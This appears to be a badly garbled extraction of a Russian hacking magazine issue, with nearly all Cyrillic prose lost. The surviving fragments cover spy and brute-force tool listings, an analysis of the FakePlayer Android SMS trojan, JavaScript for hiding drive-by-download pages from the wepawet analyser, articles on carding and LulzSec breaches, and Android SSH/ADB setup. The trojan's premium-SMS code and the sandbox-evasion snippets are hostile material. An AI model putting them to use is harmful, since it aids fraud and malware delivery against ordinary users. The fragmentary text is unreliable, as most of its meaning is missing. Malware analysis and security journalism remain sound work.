3. Decode_ALL_Files.bat.
4.
02_Decoded ( Log_Decoded.txt
).

:
ionCube PHP Loader v3.1
NuSphere PhpExpress v3.0
Zend Optimizer v3.3

decodeby.us,
.

: MicSpy By SLESH 1.0b


: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: SLESH

MicSpy++ Nightmare.
, ,
,


.

.
,

MicSpy By SLESH, MicSpy++. ,
, (,
, / ).
:
1. mp3, 24
, 32 /, .
2. MPEG LAYER-3.
3. ___--.mp3.
4.
WEB-. c 4545
(http://127.0.0.1:4545).

:

;
/ ;

;
;
.

,
,
,
, :
1. MicSpy.dpr (
).
2. API.pas , .
3. MicRec.pas .

-


.
-,


, , .
-
:
1.
(
).
2.

(WYSIWYG-, CMS,
..).
3. .
4. , .
5.

(, ).
6. -
-.
7. (
).

:
-;
;

;
;
.
, ./
run .
,
.
,
,
, .
.

,

.


, ,
,
.
.
./results, ./bases,
./data .
config.ini db. ,
, .
. -
.
,


hack4sec, hack4sec.
blogspot.com.

: Bash-Brutoforcer
:*nix
: Cyber-punk and Simo2553

md5
:

md5- /
etc/shadow.
-

.
!
bash- BashBrutoforcer,
.
, :
1. shadow-;
2. ;
3. .

,
Linux.
:
./md5brute.sh -w(ordlist)|-n(umbers)|
-i(nformation)|-b(ruteshadow)
hash|shadow
-w (X="/usr/share/dict/
words" )
-n
-b shadow


,
.

(bit.ly/qaNAkq).

.;
;
- ;
.
:
.
, (
).
, .
html .
, .


, - .

. ,
bit.ly/ncfPFh,
,
.

: IR-ID MAKER
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ParsProg Software

:
Mail.ru
: *nix/win
: Fepsis

Yahoo
Yahoo.
:

Mail.ru
Mail.Ru,
.
, (
:)
? ,

?


Mail.ru
Fepsis.
:
:
login@mail.ru:pass
login@list.ru:pass
login@bk.ru:pass
login@inbox.ru:pass


( );

;
;
;
Yahoo.

:
1. Yahoo ID
( ).
2. Password .
3. First name Last name
,
.
4. START,
CREATE.
5. . z


MALWARE

ANDROID-


(Trojan-SMS.AndroidOS.FakePlayer)
Android. apk-
.
Android
apk
(Android PacKage).
ZIP- . , ,
7-Zip` Player.apk (. 1).
, apk-
. META-INF res,
AndroidManifest.xml, classes.dex resources.arsc.
apk-.
.


Classes.dex

classes.dex apk-,
Dalvik Virtual Machine. , , Android
Java, .class,
dx,
.dex,
.
, ,
. classes.dex ,
.

, Trojan-SMS.AndroidOS.FakePlayer

Player.apk

Resources.arsc


xml-, . Hiew, (
:)) . APKTool (code.google.com/p/android-apktool).
xml`
.
: public.xml strings.xml.
:
<?xml version="1.0" encoding="utf-8"?>
<resources>
<public type="drawable" name="icon"
id="0x7f020000" />
<public type="layout" name="main"
id="0x7f030000" />
<public type="string" name="app_name"
id="0x7f040000" />
</resources>

Public.xml ,
,
.
: Animation, Color State List, Drawable, Layout,
Menu, String, Style . drawable, layout
string. ,
,
,
. strings.xml
:
<?xml version="1.0" encoding="utf-8"?>
<resources>
<string name="app_name">AndroidApplication1
</string>
</resources>

public.xml app_
name string, strings.xml
AndroidApplication1.
app_name
,
. res, .

Manifest.xml


APKTool.
,
: (package), , (android:label),
,
(android:name), (android:icon)
.. :
<?xml version="1.0" encoding="utf-8"?>
<manifest package="org.me.androidapplication1"
    xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:icon="@drawable/icon">
        <activity android:label="PornoPlayer"
            android:name=".MoviePlayer">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
    <uses-permission android:name="android.permission.SEND_SMS" />
</manifest>

, , , . uses-permission. ,
, SMS (android.permission.SEND_SMS).

RES

res . : drawable
layout. ,
. ,
icon.png.
icon public.xml.

main.xml, :
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout android:orientation="vertical"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent"
    xmlns:android="http://schemas.android.com/apk/res/android">
    <TextView android:layout_width="fill_parent"
        android:layout_height="wrap_content"
        android:text="Hello Android from NetBeans" />
</LinearLayout>

INFO

info
Android
SDK
: developer.android.com/index.html.

, jar-

manifest.mf,
META-INF

,
(android:orientation
LinearLayout), TextView (Hello Android from
NetBeans) (android:layout_width android:layout_height).

META-Inf

META-INF : , , dex- ..

classes.dex.
, .
dex2jar (code.google.com/p/dex2jar). jar-,
. , dex2jar , , dedexer. ,
P- Dalvik.
dex2jar
jar-, . , (. 4).
class-
Java. Jad, .
Java, .
.
: R.jad, R$attr.jad, R$drawable.jad, R$layout.jad
R$string.jad. . ,
,
MoviePlayer. ,
( ):
public class MoviePlayer extends Activity
{
    public MoviePlayer()
    {
    }
    public void onCreate(Bundle bundle)
    {
        super.onCreate(bundle);
        DataHelper datahelper = new DataHelper(this);
        if(datahelper.canwe())
        {
            TextView textview = new TextView(this);
            Random random = new Random();
            textview.setText(
                "\u041F\u043E\u0434\u043E\u0436\u0434\u0438\u0442\u0435...");
            setContentView(textview);
            SmsManager smsmanager = SmsManager.getDefault();
            StringBuilder stringbuilder = (new StringBuilder()).append("************");
            int i = random.nextInt(0xf4240) + 0x186a0;
            String s = stringbuilder.append(i).toString();
            android.app.PendingIntent pendingintent = null;
            android.app.PendingIntent pendingintent1 = null;
            smsmanager.sendTextMessage("***", null, s,
                pendingintent, pendingintent1);
            ...
        }
        finish();
    }
}

DataHelper DataHelper.jad DataHelper$OpenHelper.jad.


,
(if datahelper.canwe()). .
, , SQLite- dwap.db.
table1
was, . .

textview.setText. -, -
.
(random.nextInt) (smsmanager.
sendTextMessage). .
,
.

,
-.
-,
:), ,
, ,
. -, . z

MALWARE
Korse
(andrepetukhov.wordpress.com)

DRIVE-BY-DOWNLOAD
-

wepawet

Drive-by-Download.
,
,

(, flashplayer, pdfviewer, ActiveX ..).

. ,
- ,
. . ,
: ,
, . - . , ,
- HTML+JS+CSS,
:
, ,
.

wepawet (wepawet.cs.ucsb.edu/),

100%.

,
IP-. , ,
. , IP- ,
.
,
- .
IP-
(https://check.torproject.org/cgi-bin/TorBulkExitList.py) . IP- ,
,
(


AJAX- onscroll

Firefox 4.0

alert(1)
LastModified-
, , ,
).

referrer. ,
, referrer
facebook.

Fingerprinting

, IP- . .
-, security- , IP- , . -, OpenVPN, -,
,
,
(, ). ,
(. HtmlUnit), ,
.

.
.
CAPTCH
, ( onmousemove ,
). ,
.
web
.
: HTML5, JavaScript, CSS .. , :
1. User-agent
JavaScript.
2. HTML5.
3. HTML + events.
4. .
.
1. User-agent JavaScript
user-agent,
,


. ,
. .

JS.
2. HTML5
: HTML5.
(, caniuse.com, browserscope.org).
.
, ,
:
Firefox 4.0
<svg xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg" viewBox="0 0 200 100"
width="0px" height="0px" id="inlineSVG">
</svg>
<script type="text/javascript">
var isFF = !!(1*({toString:0,valueOf:function(x){
return !!x;}}));
var inlineSVG = document.getElementById("inlineSVG");
var isFF4 = isFF && (inlineSVG != null);
</script>

3. HTML +
JS HTML5
JS. , , XSS. XSS
( html5sec.org),
JS, onfocus, onblur, onscroll. , XSS,
? : !
, , ( , , HTMLUnit,
),
. onscroll
html5sec. AJAX-
.
<body onscroll=makeAJAXrequest(1,eval)>
<br><br><br><br><br>
<br><br><br><br><br>
<br><br><br><br><br>
<input autofocus />
</body>
/* makeAJAXrequest(param, callback)
*/

<p>- Xpath

Wepawet

4.

, , : flash, pdf,
java, ActiveX, etc. ,
. , ,
: panopticlick.eff.org.

.
,

, .

, . JavaScript ,
jjencode (utf-8.jp/public/jjencode.html).
,
, .
, .
, , ,
. ,
HTTP, , . :
LastModified-
<script type="text/javascript">
var dt = new Date(document.lastModified);
var str = "di`wq-4,>"; //XORed "alert(1);" with key 5;
var key = dt.getHours() % 8;
var result ="";
for(i=0;i<str.length;++i)
{
result +=String.fromCharCode(key^str.charCodeAt(i));
}
eval(result);
</script>

, ,

.
:
1. .

JavaScript jjencode
:
var func = eval;
func("alert(1)");

2. Xpath JavaScript.
:
<p>- Xpath
<script type="text/javascript">
var paragraphs = document.evaluate("//p",
document, null,
XPathResult.ANY_TYPE, null
);
</script>

3. HTML5 , .
, , SELECT, , eval.
, , ,
SQL. , Ecmascript for XML, XML:
alert(1)
<script type="text/javascript">
openDatabase('',1,1,0).transaction(function($){
$.executeSql('SELECT "al" || "er" || "t(1)"', [],
function($,results){
for(i in results.rows.item(0))
eval(results.rows.item(0)[i])
})
})
</script>


. -
. , , ,
wepawet ,
. z



I ncognitus (mifrill@real.xakep.ru)

Crutop, RX-Promotion, Fethard Chronopay


HTTP://WWW
links
http://bit.ly/iXANMF

.
http://bit.ly/e1x29l
Chronopay

.
http://bit.ly/n9MfMy


RedEye.
http://wapo.st/2oV3Ye
Washington
Post.
http://sporaw.livejournal.com/89032.html .

RedEye - ,
. -, , Fethard, 19 . ,
!

RedEye 1999 .
,
( )
.
Pornocruto.nu.
,
: rape zoo.
. ( Ibill.com). .


news-.

,
.

,
, , . RedEye
,
- ,

. ,
.

.
- Crutop.nu.

, , .
2005
.

Master-x.com .

(
).



:
, ,

.
:
,
Pornocruto.nu,
50%- .
2000
.
:
- , , 95% .
, ,

- . RedEye
Rape.
cash.pornocruto.

nu .

Pornocruto Cash

2000 2002 Pornocruto Cash (PC).


9 ,
. ,
80/20: 80% 20% .
Scream and Cream (www.
screamandcream.com).
2000 ,
RedEye , :

.
www.badtales.com www.violentcomix.

com
,
BDSM-
Gary Roberts.
bit.ly/pZLnJS.

, .
, ,
. ,
,


? , !


Ibill.com. 35-40
.
2001-2002
( 200
).
,
,
, Crutop, RedEye
,
Pornocruto Cash .
Pornocruto Cash
170 200 .
( 2001-2002 !). ,

, .

Pornocruto Cash

Pornocruto Cash
2002 , Ibill .
, Pornocruto Cash.
-
, .

:
1999

2000

pornocruto.nu : zoo- rape-.



,
: Forbes
,
. Ibill.com.


, .
RedEye
,


.
-. 2005 -.

Pornocruto.nu


Crutop.nu


RedEye RedEye,
.
:
, !

2002 c Desp (
),

, .

CHRONOPAY B.V., .
?
. ,
(Ronnie Beernaert),
Pornocruto Cash, RedEye
CHRONOPAY B.V.
,
: ,

.
, rape

fantasy domination BDSM. Pornocruto Cash
2009 .

,
, .
, , Fethard
RedEye, , ,
, ,
RedEye ,

-.
2003 RedEye
Fethard.biz. , Crutop.nu, ,
Fethard , , .
, 2007
RedEye adult ,

.
Fethard.biz
.
,
, Fethard , .
Fethard
: Yambo ( Y
, ),
CapitalCollect, Ecuator.biz,
.
, ,
2003-2007
Fethard.biz.
2007 Fethard.biz .

Fethard 2008

Fethard .
RedEye.
.
,
100%- -

. Fethard.biz :
1.
;
2.
.
, 12 2007
Fethard.biz Crutop.nu
.
3295 440 000
:
Crutop.nu. , 12 2007
Fethard.
biz.
. ,
. RedEye - .
,
- .
Fethard?

: ,
Fethard,

( -

2001

2002

2003

Cash.Pornocruto.nu
.
9 -,
,
.
Scream and Cream (www.
screamandcream.com).
Pornocruto Cash $170200k ,
Ibill.com.

2002 Ibill
, , :
rape- .
CHRONOPAY
B.V.,
(Ronnie Beernaert),
Pornocruto Cash. 9

Chronopay.

Fethard -,

.
cash out-:



.
Crutop.nu,
.

Fethard

Fethard -,

.
Fethard Finance ,
-
.
Fethard.biz 2002 RedEye
Crutop.nu.

Crutop.nu
Fethard , ,

Pornocruto Cash


Fethard

CHRONOPAY B.V.

Fethard


Chronopay
), ,
,

-,

, PIN- () .
,
,
Fethard .

-, ,
.

. RedEye $6 000 000.
(
2007 ), -

,

.
RedEyea, , ,
.

.
, 12 2008
.
,
.
:).

, .

,
30 www.redeyeblog.com, ,
, RedEye,
.

, , 76
bit.ly/eu0OHE.
.
chronopay.com
Google Analytics.
, ,
ID , RedEye: cash.
pornocruto.es etu-cash.com.

2004-2006

2007

2008


. Fethard 200% ,
Chronopay
high risk- , spyware,
. 2006
Fethard.biz
.

12 2007 Fethard.
biz,
. 1-2 1-2
4 .
RedEye,
PIN
. ,
6 .

RedEye : , 12 2008 ,
.
,
.
Fethard 19 .


=
RedEye?

Fethard




crutop.nu
Pornocruto Cash
Chronopay
Fethard
- Rx-Promotion

,
.
DDoS-

( Chronopay)
Engel,
.
,
, , . RedEye
, . (
-
), .
.
, .
:
,
.

(!) , , ,
.

, ,
Mac- Mac Defender, DDoS-
,

RX-Promotion . , DDoS ! z

2009

2010

2011


(,
..)
.
: , , .
:

Harley Davidson.

: , 25-26
2010
,
2009-2010 ,
cvv-.
, - NS- .


, (!)
.
DDoS- (
Chronopay)
. 25 RedEye

, .

Welcome to Russia!
-
( )
.

Chronopay


(www.chronopay.ru),
CHRONOPAY B.V. .
:

,

, .
,

,

Rx-Promotion


high risk-
:
, spyware, , ..
www.redeye-blog.com:
,
. , ,
, ,
.

chronopay.com


Mifrill , (mifrill@real.xakep.ru)

LulzSec


. Lulz Security : , ,
IT-. ,
, for lulz, . .

2011

,
, ,
+ .
,
,
.
,
, , , ,
, , .
, ,


. , ...
- Lulz Security,
,
. , , , .
Lulz Security
( LulzSec Lulz Boat )
. ,
, .
X-Factor ,
, American Idol Britains Got Talent.


250 ,
12 . , , , email .
LulzSec (lulzsecurity.com)
Releases, ,
.
SQL, txt, .
, ,
, .
:
LulzSec, , ,
: .
, , ,

, .

: twitter.com/LulzSec.

, ,
.
LulzSec ,
Fox.
Fox Broadcasting. ,
, -

!
.
,

LulzSec. Fox,
(, , Firefly?)
Fox .

AntiSec, LulzSec


. PBS
,
Lulz Boat ,
. .
Sony ,
, . LulzSec
. SonyMusic.co.jp SQL, ,
, ,
. LulzSec : 1337 h4x0r,
- Sony.
8? 7 ?!.
, , (
Sony, ).
, Lulz Security WikiLeaks
-
, , .
-
gray hat (
) , . , LulzSec,
.
- .

Lulz Boat

. 0day- MoveableType,


Havij 1.14 Pro ( SQL-), (PBS).


. PBS NewsHour
, 15

. PBS
Twitter
, .
, ,
0day-, , LulzSec php ftp, ,
27 2.4.21-37.ELsmp 2005 i686.
, , .
All your base are
belong to LulzSec ( LulzSec), , , SQL .
, PBS.
, ,
- , MySQL- .
, , ,
. LulzSec :
PBS Wikileaks,
. Frontline:
Wikisecrets PBS . ,
,
. , , .


:
. WikiSecrets,
- .
PBS, ... .
,
( !)
. , , :
!
, ,
PBS. PBS ,
.

LulzSec , LulzSec .
: .
, ,
. , ,
.
, , .
, Sony ,
LulzSec , .
, , Sony
Playstation Network.
,
?,
. ,
, .
. LulzSec:
SonyPictures.com SQL, , .

!.. .
, , email-, ,
, , . , Sony Pictures ( ),
75 000 3,5 .
, LulzSec
.
- , , ,
.
Sony
IT , LulzSec
.
,
. LulzSec , ,
( ), ,
.
InfraGard.
, ,
, .
, .
infragardatlanta.org LulzSec 180 ,

LulzSec
(,
:)


? Lulz
Security.
Fuck FBI Friday.
, ,
, LulzSec Nintendo.
(
).
, LulzSec
,
lulzsecurity.com nintendo.com.

Sony, Sony Computer Entertainment
Developer Network.
, ,
.

. AntiSec

, ASCII

Chinga la migra
. , ,
( Unveillance,
)
Infragard .
LulzSec ,
, Unveillance .
, , .
,
LulzSec
Unveillance . .
, LulzSec ,
, -



, 13-
.
:
, . .
, ,
.
,
.
Senate.gov. ,
? - ?.
Reuters, ,

,
.

.
Lulz Boat Pron.com, 26 000 ,
. Facebook
.
, ,
, email-
, . ,
, 26 ,
.
LulzSec 55 .

Bethesda Softworks
ZeniMax Media .
,
, ,
: . , : LulzSec email-,
, BRINK,
. ,
,
200 000 BRINK Quake 4.
LulzSec , ,
Bethesda. - , .
, -
, , .

LulzSec,
... , , EVE Online, Escapist
Magazine, Minecraft League of Legends. LulzSec
, :
, .
, , , .

, .

. 4chan /b/
, LulzSec,
, , , . ,
. - ,
, ! .
, LulzSec, ,
. , , ,
LulzSec , AntiSec.
AntiSec, , .
LulzSec
. cia.gov ,
. LulzSec : cia.gov .
AntiSec. , 90- .
,
. AntiSec,
, , ,
,
.
LulzSec
. ,
DDoS, - .
Lulz Security :
t.co/JhcjgO9 #AntiSec,
.
,
presidencia.gov.br, brasil.
gov.br .
Twitter, , , , ,
.
, DDoS.

.
SB1070, ,
LulzSec ,
.
Chinga la migra,
. LulzSec email-, . , .

, LulzSec ,
,
.
20- , ,

( )
LulzSec. , 19 . , LulzSec :
, LulzSec , ... ... , , !
?.
, 26- , -
.
50- , : !.
, , , , , , ,
, , . ,
, - - , , .
LulzSec ,
, . , ,
LulzSec AntiSec,
, , ,
.
LulzSec . :
AOLinternal data.txt
AT&T internal data.rar
Battlefield Heroes Beta (550k users).csv
FBI being silly.txt
Hackforums.net (200k users).sql
Nato-bookshop.org (12k users).csv
Office networks of corporations.txt
Private Investigator Emails.txt
Random gaming forums (50k users).txt
Silly routers.txt
navy.mil owned.png

LulzSec (@
AnonymousIRC) : @LulzSec
. ? .
, , ?
, ,
,
.
. The Guardian IRC- #pure-elite,
. Lulz
Security , ,
, LulzSec,
. , joepie91, Neuron, Storm, trollpoll voodoo
Lulz Boat, ,
, .

? . ,

The Sun. News
Corporation. , News Corporation News International
The Times. , LulzSec
.
,
. z


PWNIE
AWARDS
2011

:
?



The Pwnie Awards.

, .
. .
. ?
, pwn\own
(, , ) pony (,
, ). The Tony Awards
, , , . , , . ,
.
.
Black Hat, .


01


.
,
.

Padding Oracle
ASP.NET (CVE-2010-3332)
(Juliano Rizzo), (Thai Duong)
, ASP.NET
Padding Oracle,
ASP.NET
web-,
.


Microsoft FTP (CVE-2010-3972)
(Matt Bergin)
, ftp- Microsoft.
- Telnet IAC ( , 0xFF).
:
, FTP-
.
(Chris Valasek) (Ryan
Smith), EIP
, ftp-.


ISC dhclient (CVE-2011-0997)
(Sebastian Krahmer)
(Marius Tomaschewski)
ISC dhclient DHCP-.
,
. ,
DHCP-
.

IPComp
BSD- (CVE-2011-1547)
(Tavis Ormandy)
BSD-
IPComp,
IPSec. IPComp , ( ). ,
.


Exim (CVE-2010-4344)

Exim
, .
. , EIP, shell-,
.

02 03

,
. ,
.

FreeType iOS (CVE-2011-0226)


Comex
Comex Type
1 FreeType,
Safari. ROP-, Comex ASLR iOS
. Comex
jailbreakme.com iOS .

Google Chrome
VUPEN
security- VUPEN
Google Chrome, Google

. , security-
Google , VUPEN -
Flash. , Flash ( Chrome )
, HTML. VUPEN , , ,
.


Java (CVE-2010-4452)
(Frederic Hoguin)
, Java .
- .
JRE 100% .

Blackberry Pwn2Own
(Vincenzo Iozzo), (Willem
Pinckaers), - (Ralf-Phillipp Weinmann)
WebKit ,
BlackBerry.
, , , -
RIM.

, .
,
.
, .

CSRSS (CVE-2011-1281)
j00ru (Matthew j00ru Jurczyk)
Windows CSRSS,
:

, ,
SYSTEM (utilman.exe) .


set_fs (CVE-2010-4258)
(Nelson Elhage)
Linux,
CLONE_CHILD_CLEARTID
set_fs function ,
,
DoS. PoC
.


Linux $ORIGIN (CVE-2010-3847)
(Tavis Ormandy)
, glibc $ORIGIN
LD_AUDIT,
setuid
. root.

win32k user-mode
callback Windows (MS11-034)
(Tarjei Mandt)
, 40
Windows. Infiltrate 2011, .

XSS Android
(Jon Oberheide)
XSS- Android, ,
.


04 05

, ,
,
email-.

Stackjacking
(Jon Oberheide),
(Dan Rosenberg)

Linux Grsec-
spender
PaX Team. ,
,
.


Flash ActionScript
(Haifei Li)
JIT Flash ActionScript
, Windows 7, ASLR DEP.

Adobe Shockwave
(Aaron Portnoy), (Logan Brown)

SmartHeap Adobe Shockwave.

.

Static Binary Rewriting

, .


OpenSSH Novell NetWare
: Novell
ZDI advisory , , Novell , DoS
, ZDI
. 0x41414141 .

Magix Music Maker 16



: Magix
CORELAN Music Maker 16,
, PoC-.
, .

RSA SecurID
: RSA
, SecurID .
RSA?
, . ,
. ,
RSA Lockheed-Martin.

(Piotr Bania)
- pax-future.txt,

Windows, [ !]
,
Windows.

LFH-
(Chris Valasek)

Low Fragmentation Heap Windows 7 Vista. !


06 07

Epic 0wnage

110%,
.
, ?
, (-) epic fail.

Sony
:

Epic 0wnage ,
,
. , ,
oww ( 0wnage) .

Sony

CMS,

Google Apps, , , . .
, HBGary Federal , 1,21 -oww.

Fail0verflow GeoHot ,
PS3, Sony .
, , ,
, .
Sony GeoHot , .
, ,
MiniDisc.

Sony
, . ,
Sony Sony Online
Entertainment (SOE). 25
SOE ( 77 )
.
, : FAIL.

Sony
- Sony
. , , Sony?
LulzSec, , , Sony
FAIL.

Sony
Sony , PlayStation
Network , .
PSN , .
, ,
8- ,
. , Sony.

Sony
?
, ! , Sony
,
. , .


HBGary Federal

LulzSec ,
LulzSec . Fox
News, PBS, Nintendo, pron.com, NHS, InfraGard, ,
Bethesda, Minecraft, League of Legends, The Escapist, EVE
online, , The Times The Sun.

.

(Bradley Manning) Wikileaks


Wikileaks ,
.
CD .

Stuxnet
? ?
0day- , , ?
.

08

? ,
( ),
.
Pwnie HD Halvar
. , , .

. Geohot
Sony . ,
, . z


UNIXOID
(execbit.ru)

Android-

Linux,
, Android
. , ,
,
, ,
, .


, , Android
,
.

,

. , Android : ,
SD- ( -


-) .
, .
, , .
- ,
, , ,
micro-USB-.
Wi-Fi
3G-, Android ( $100 ).
Android ,
.

FTPServer

INFO
ADB

WebSharing

, FTPServer.
FTPServer FTP- ,
SD-. : , ,
User (FTP-), Pass (
), Port ( 1024, , 1234), Default dir
( , /sdcard /mnt/sdcard), Any Network
Save and Restart Service.
, IP- FTP-.
FTP-, ,
/usr/bin/ftp mc. ,
,
.
FTP-, ,
.
SFTP, SSH- Android
( , ),
- WebSharing.
WebSharingLite
HTTP-, NextApp.

,
, (
Wi-Fi,

).
,
, ,
(, ,
).
. Start . IP- ,
,
. WebSharing
Wi-Fi,
(Menu Settings Network Settings Cellular
access).
.


Android
ADB (Android Debug Bridge).

,
Android SDK (
xda-developers.com).
ADB ,
,
, shell-,
, ,
.

info
Android

Dropbox-,


.

ADB
,



Android.
ADB

,
.

,

QR-
Barcode Scanner.


UNIXOID

ADB ,
(
USB).
micro-USB- ADB :
$ ./adb devices
016804110602C024	device

SSH-

, , , ,
.
adb shell, shell-
, ( ) Linux.
POSIX- id, ls, ps ..
, , , ,
/bin/su, root ( , /
SD-).
root-,
busybox, ,
. ,
SuperOneClick (shortfuse.org,
Linux mono SuperOneClick.exe).
ADB, .
,
. :
$ for apk in *.apk; do ./adb install "$apk"; done

ADB :
$ ./adb push __ ///

:
$ ./adb pull /////

,
,
.
adb sync,
:
$ ./adb sync ///////
/

, / ( ).
ADB
( ):
$ ./adb reboot-bootloader

FTP Server


ADB ,
,
,
. , Android
ADB .
, Wi-Fi-, , Debug
over USB only ( Debug over

Open Source), ,
,
SSH- Android,
. :
1. , xda-developers.com,
SuperOneClick z4root (goo.gl/Bv7tx,
Android).
2. BusyBox (,
BusyBox Installer). , root
SuperOneClick.
3. Dropbear:
$ wget http://jhulst.com/dropbear.tar.gz
$ tar -xzf dropbear.tar.gz
$ ./adb push ~/dropbear /sdcard
$ ./adb shell
> su
> mount -o remount,rw /system
> cp /sdcard/dropbear/* /system/xbin
> chmod +x /system/xbin/dropbear /system/xbin/dropbearkey
> mkdir /data/dropbear
> dropbearkey -t rsa -f /data/dropbear/dropbear_rsa_host_key
> dropbearkey -t dss -f /data/dropbear/dropbear_dss_host_key

DroidSSHd

ConnectBot

Lazier Geek

ConnectBot
USB only). ADB 5555 ( IP- : Wi-Fi
IP-).
ADB :
$ ./adb connect IP-

:
$ ./adb devices
192.168.0.100:5555	device

,
, shell.
SSH-.

SSH

, Java-
, Android
Linux-,
,
POSIX. ,
Linux-, SSH-,
Dropbear.

SSH-, SD-
SFTP,
Linux.
Dropbear
Android, SSHDroid Android Market .
(Dropbear -

, Dropbear ,
SSHDroid.
DroidSSHd (code.google.com/p/droidsshd/)
Dropbear , CyanogenMod 7.1. DroidSSHd
SSH- ,
, ,
( , )
.

,
, Service and Authentification.
(
password), ( SD), (TCP port to
listen, 2222)
(Start on boot).
,
( ),

System settings Run daemon as root.
,
Start. IP-, .
SSH-,
, ssh:
$ ssh -p 2222 android@192.168.0.100

( )
Android .


UNIXOID

SSHmote

Transdroid

VLC Remote

Android VNC
Viewer

droid VNC Server

WebSharing


SSH-, ( ) ConnectBot. SSH-


, SSH .
,
, (Apache
License 2.0, ),
( )
SSH.
,
, . ConnectBot
, ,
.
. -,
/
(, px
ping xakep.ru), -
Android Lazier Geek. Lazier Geek

.
, ,
,
.
, Lazier Geek,
: Name
, Host
IP, User Pass.
, ,
. Save
,
. .


. ,
,
.
Windows, ,
Linux, Java, . ,
- .
, ,
SSHmote. mplayer, VLC, Amarok,
Kaffein ,
SSH, ,
, ,
SSH-.
SSHmote . SSH-,
(
)
(, Home mplayer).
,
,
. ,
,
/, , ..
SSHmote
, : SSH- ,

,
screen , ,
. , VLC,
VLC- VLC-Remote (
,
,
Peter Baldwin).
VLC Remote ,
, , VLC HTTP-.
:
$ vlc --extraintf=luahttp --fullscreen \
--http-album-art --qt-start-minimized

, VLC , IP
:
$ su -s
# echo 123.456.789.012 >> /usr/share/vlc/lua/http/.hosts

0.0.0.0/0
IP-,
.
, (, ),
Add VLC server IP- . (
), .. , , Amarok2 Remote, Banshee Remote
mythdroid MythTV. .
Torrent- Transdroid.
,
, (QR- ). Transdroid Torrent-
Linux, .
,
Transmission.
Transmission .

Web.
web-.
, .
Transdroid, ,
,
, (Transmission), IP, 9091, , , ,
.

,
. ,
- , VNC ( ). VNC-
, ,
Android Linux. Android, Android VNC Viewer,

SSHmote ,

VLC Remote

.
, :
1. VNC-:
$ sudo apt-get install tightvnc

2. ~/.vnc/xstartup
, :
$ vi ~/.vnc/xstartup
xrdb $HOME/.Xresources
startfluxbox &

(, startkde).
3. vncserver,
n
.
4. Android VNC Viewer, Password
( ), Address (IP- ), Port (
5901 5900) 24-bit
color Color Format, . Connect

.
,
.
VNC- droid
VNC server, Start
Server. vncviewer:

VNC-? !

,

Android. , .
: Wifi keyboard, ;
Chrome to Phone Google
Chrome ; IP
Webcam, web-; Remote
Web Desktop, ; NagMonDroid, Nagios; Zabbix
on the go Zabbix-. z

$ vncviewer IP-:5901

,
5801.

UNIXOID
Adept (adeptg@gmail.com)

38

,
: SiSoft Sandra,
3DMark, PCMark . nix ,
, .

CPU

, CPU.
.
Super Pi. Linux,
( 64- ).
Linux Pi. :
# apt-get install pi

, Pi
.
:
$ time pi 1048576 >/dev/null | grep real

, Pi 1048576 . Intel Core i5-2410M


0m1.675s, Intel Core i5-2300 0m0.137s.
, ,
, . ,
Pi ( Super Pi) .
. 7-zip
CPU ( / ,
, ). :
$ 7z b

, . ,
: / KB/s,
( )
MIPS ( ).


MIPS ( Linux
Tot).
Intel Core i5-2410M : 344, 2065, 7064. c ( ),
, MIPS, ,
(
).
Intel Core i5-2300 (): 357, 3049,
10771.

sysbench CPU. .
$ sysbench --test=cpu --cpu-max-prime=20000 run

, :
. Core i5-2410M
30,9614, Core i5-2300 27,8938.
GUI , hardinfo.
.
CPU . .
, .

, , ,
. , Linux mbw (Memory
BandWidth).
. :
,
. ( 10),

, benchmark GUI


openbenchmarking.org.
28 2011 Southern California Linux Expo. :
41258 ;
89,217 PTS (
openbenchmarking.org);
32189 PCI- 16536 USB;
325351 .

CPU 7-zip
.
:
execution time (avg): 32.6897
:
execution time (avg): 29.8387

sysbench ,
CPU. . :
$ sysbench --test=memory --memory-oper=read run

20,0857 19,5404 .
Ubuntu
CPU Intel
GPU Nvidia
Asus
HDD Samsung
FS ext4

. , :
$ mbw 512 | grep AVG

512 . ,
.

mbw-,
(, ).
:
AVG Method: MEMCPY Copy: 2765.609 MiB/s
AVG Method: DUMB Copy: 4248.589 MiB/s
AVG Method: MCBLOCK Copy: 11930.338 MiB/s

:
AVG Method: MEMCPY Copy: 5372.418 MiB/s
AVG Method: DUMB Copy: 7563.436 MiB/s
AVG Method: MCBLOCK Copy: 13755.269 MiB/s

sysbench .
$ sysbench --test=memory run


HDD

HDD . , hdparm:
hdparm -t /dev/sda

2,5" HDD 5400RPM 75,80 MB/sec. SSD Intel


320 222,93 MB/sec. , .
,
sysbench. -, :
seqrd ;
seqwr ;
seqrewr ;
rndrd ;
rndwr ;
rndrw .

. , . , :
$ sysbench --test=fileio --file-total-size=10G \
--file-test-mode=seqrd prepare

test.
'--file-total-size' , , . :
$ sysbench --file-total-size=10G --test=fileio \
--file-test-mode=seqrd run


UNIXOID

.
iozone.xls (
), , /.
LibreOffice
. - , ,
. iozone ,
gnuplot.

sysbench:

- . ,
Phoronix Test Suite ( PTS).
GPLv3.
,
, Ubuntu:

( ):
# apt-get install phoronix-test-suite
$ sysbench --test=fileio --file-total-size=10G \
--file-test-mode=seqrd cleanup

:
*
*
*
*

seqrd
seqwr
rndrd
rndwr

42.675Mb/sec,
47.377Mb/sec,
1.3463Mb/sec,
1.5153Mb/sec,

2731 IOPS
3032 IOPS
87 IOPS
97 IOPS

263.1Mb/sec, 16838 IOPS


121.95Mb/sec, 7804 IOPS
390.63Mb/sec, 25000 IOPS
70.559Mb/sec, 4515 IOPs

SSD:
*
*
*
*

seqrd
seqwr
rndrd
rndwr

bonnie++.
: ( ),

.
CPU ( ) . bonnie++
plain-text 80 , .
html:
$ bonnie++ -n 1024 | tail -1 | bon_csv2html \
> bon_result.html

'-n' ,
(
1024). , /
, (
+++++).
SSD (129 Mb/sec)
(315 Mb/sec) , sysbench.
48348 ,
6464 .
1090971 .
, , , iozone.
:
$ iozone -Ra -g 10G > iozone.xls

'-a' , '-R' Excel


, '-g'
( ). ,


PHP
. , (phoronix-test-suite.com) deb- . Live-,
, 3.4 ( )
. Live- ,
,
.
3.0 GUI, , PHPGTK2, , . ,
- GUI CLI- ,
. ,
:
$ phoronix-test-suite interactive

:
